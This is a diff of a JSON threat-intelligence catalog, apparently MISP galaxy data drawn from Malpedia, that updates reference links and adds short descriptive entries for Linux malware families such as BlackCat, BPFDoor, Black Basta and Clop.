- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
"https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
"https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate",
- "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns"
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30"
],
"synonyms": [],
"type": []
@@ -3228,8 +3474,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel",
- "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-olive"
+ "https://www.secureworks.com/research/threat-profiles/bronze-olive",
+ "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf"
],
"synonyms": [
"Ghost RAT"
@@ -3246,10 +3492,11 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.avoslocker",
"https://blog.lexfo.fr/Avoslocker.html",
"https://www.ic3.gov/Media/News/2022/220318.pdf",
- "https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html",
- "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen",
"https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux"
+ "https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux",
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen"
],
"synonyms": [],
"type": []
@@ -3288,15 +3535,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
"https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
"https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
"https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
"https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
"https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
],
"synonyms": [],
@@ -3335,24 +3583,38 @@
},
{
"description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.badcall",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "350817e8-4d70-455e-b1fd-000bed4a4cf4",
+ "value": "BADCALL (ELF)"
+ },
+ {
+ "description": "Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
+ "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
+ "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/",
"https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora",
- "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
- "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
- "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
+ "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
+ "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
"https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
"https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
- "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/",
- "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
"https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/",
+ "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
"https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
- "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
- "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/"
+ "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218",
+ "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt"
],
"synonyms": [
"Gafgyt",
@@ -3363,15 +3625,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "55f8fb60-6339-4bc2-baa0-41e698e11f95",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "81917a93-6a70-4334-afe2-56904c1fafe9",
"value": "Bashlite"
},
@@ -3388,11 +3641,28 @@
"uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209",
"value": "BCMPUPnP_Hunter"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bianlian",
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
+ "https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f6be433e-7ed0-4777-876b-e3e2ba7d5c7f",
+ "value": "BianLian (ELF)"
+ },
{
"description": "Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost",
+ "https://twitter.com/strinsert1Na/status/1595553530579890176",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf",
+ "https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/",
"https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/"
],
"synonyms": [
@@ -3429,30 +3699,51 @@
"uuid": "8e301f58-acef-48e7-ad8b-c27d3ed38eed",
"value": "BioSet"
},
+ {
+ "description": "ESXi encrypting ransomware, using a combination of the stream cipher ChaCha20 and RSA.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackbasta",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "35c86fef-18fe-491c-ad3c-13f98e8f5584",
+ "value": "Black Basta (ELF)"
+ },
{
"description": "ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.\r\n\r\nALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
- "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
- "https://blog.group-ib.com/blackcat",
- "https://killingthebear.jorgetesta.tech/actors/alphv",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
- "https://www.forescout.com/resources/analysis-of-an-alphv-incident",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
- "https://securelist.com/a-bad-luck-blackcat/106254/",
+ "https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
+ "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3",
"https://twitter.com/sisoma2/status/1473243875158499330",
"https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
- "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
+ "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
+ "https://securelist.com/a-bad-luck-blackcat/106254/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
+ "https://www.forescout.com/resources/analysis-of-an-alphv-incident",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/",
"https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
- "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/"
+ "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
+ "https://blog.group-ib.com/blackcat",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://killingthebear.jorgetesta.tech/actors/alphv",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous"
],
"synonyms": [
"ALPHV",
@@ -3468,34 +3759,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://blog.group-ib.com/blackmatter#",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://twitter.com/VK_Intel/status/1423188690126266370",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
"https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
- "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
+ "https://twitter.com/VK_Intel/status/1423188690126266370",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
"https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
"https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
"https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
- "https://blog.group-ib.com/blackmatter2"
+ "https://blog.group-ib.com/blackmatter2",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [],
"type": []
@@ -3509,8 +3801,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/",
- "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/"
+ "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/",
+ "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/"
],
"synonyms": [],
"type": []
@@ -3518,6 +3810,20 @@
"uuid": "a30aedcc-562e-437a-827c-55bc00cf3506",
"value": "Blackrota"
},
+ {
+ "description": "According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove",
+ "https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw",
+ "https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f347147-c34e-4698-9439-c640233fca15",
+ "value": "BOLDMOVE (ELF)"
+ },
{
"description": "This is a pentesting tool and according to the author, \"BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.\".\r\n\r\nIt has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.",
"meta": {
@@ -3538,10 +3844,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.botenago",
+ "https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
"https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github",
"https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/",
- "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/",
- "https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits"
+ "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/"
],
"synonyms": [],
"type": []
@@ -3554,15 +3861,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
+ "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game",
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
+ "https://twitter.com/cyb3rops/status/1523227511551033349",
+ "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/",
+ "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
+ "https://twitter.com/CraigHRowland/status/1523266585133457408",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
"https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/#",
- "https://troopers.de/troopers22/talks/7cv8pz/",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
- "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/",
- "https://twitter.com/CraigHRowland/status/1523266585133457408",
- "https://twitter.com/cyb3rops/status/1523227511551033349",
- "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+ "https://troopers.de/troopers22/talks/7cv8pz/"
],
"synonyms": [
"JustForFun"
@@ -3572,17 +3880,30 @@
"uuid": "3c7082b6-0181-4064-8e35-ab522b49200f",
"value": "BPFDoor"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.brute_ratel",
+ "https://bruteratel.com/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2fa4ac4e-3f89-4fd0-b4fd-2c776dcf69d8",
+ "value": "brute_ratel"
+ },
{
"description": "Pangu Lab discovered this backdoor during a forensic investigation in 2013. They refer to related incidents as \"Operation Telescreen\".",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bvp47",
- "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html",
- "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf",
- "https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
"https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf",
- "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/"
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
+ "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf",
+ "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/",
+ "https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/",
+ "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html"
],
"synonyms": [],
"type": []
@@ -3590,6 +3911,19 @@
"uuid": "0492f9bf-3c5d-4c17-993b-2b53d0fb06f7",
"value": "Bvp47"
},
+ {
+ "description": "Linux malware cross-compiled for x86, MIPS, ARM. XOR encoded strings, 13 commands supported for its C&C, including downloading, file modification and execution and ability to run shell commands.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.caja",
+ "https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "06816c22-be7c-44db-8d0d-395ab306bb9b",
+ "value": "Caja"
+ },
{
"description": "According to Avast Decoded, Caligula is an IRC multiplatform bot that allows to perform DDoS attacks. It is written in Go and distributed in ELF files targeting Intel 32/64bit code, as well as ARM 32bit and PowerPC 64bit. It is based on the Hellabot open source project.",
"meta": {
@@ -3621,11 +3955,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked",
- "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/",
- "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
- "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
"https://blogs.cisco.com/security/linuxcdorked-faqs",
- "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html"
+ "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html",
+ "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
+ "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
+ "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
],
"synonyms": [
"CDorked.A"
@@ -3674,13 +4008,27 @@
"uuid": "7a226df2-9599-4002-9a38-b044e16f76a9",
"value": "Cetus"
},
+ {
+ "description": "Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos",
+ "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html",
+ "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ef03e3c3-32d5-483a-bd1f-97dd531c4bca",
+ "value": "Chaos (ELF)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
- "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
+ "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html"
],
"synonyms": [],
"type": []
@@ -3701,16 +4049,33 @@
"uuid": "e5600185-39b7-49a0-bd60-a6806c7d47dd",
"value": "Chisel (ELF)"
},
+ {
+ "description": "ELF version of clop ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.clop",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/",
+ "https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/"
+ ],
+ "synonyms": [
+ "Cl0p"
+ ],
+ "type": []
+ },
+ "uuid": "3d11ec52-9ca8-4d83-99d4-6658f306e8e4",
+ "value": "Clop (ELF)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
+ "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf",
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf"
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [
"Snoopy"
@@ -3725,17 +4090,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti",
